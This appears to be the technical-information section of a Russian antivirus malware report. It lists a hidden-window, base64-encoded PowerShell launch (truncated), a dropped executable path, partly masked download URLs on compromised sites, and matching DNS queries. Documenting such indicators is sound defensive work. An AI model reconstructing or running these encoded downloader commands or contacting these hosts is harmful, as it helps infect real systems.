Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\cu3dpvb\d74a8qu\qlrf9ve.exe
- %HOMEPATH%\cu3dpvb\d74a8qu\qlrf9ve.exe
- http://ja###usic.com/wp-includes/ueTmex/
- http://ja###usic.com/cgi-sys/suspendedpage.cgi
- http://www.co####tmyadvo.com/content/Jr6/
- http://th###bbsapp.com/backup-14-10-2020/yBV/
- http://ce####arsearay.com/wp-admin/RuMpdND/
- http://me####infotech.com/maliga/OFbr/
- http://an#####sarandrea.com/wp-content/Ge/
- http://up###udweb.com/content/GVI7/
- DNS ASK ja###usic.com
- DNS ASK co####tmyadvo.com
- DNS ASK th###bbsapp.com
- DNS ASK ce####arsearay.com
- DNS ASK me####infotech.com
- DNS ASK an#####sarandrea.com
- DNS ASK up###udweb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)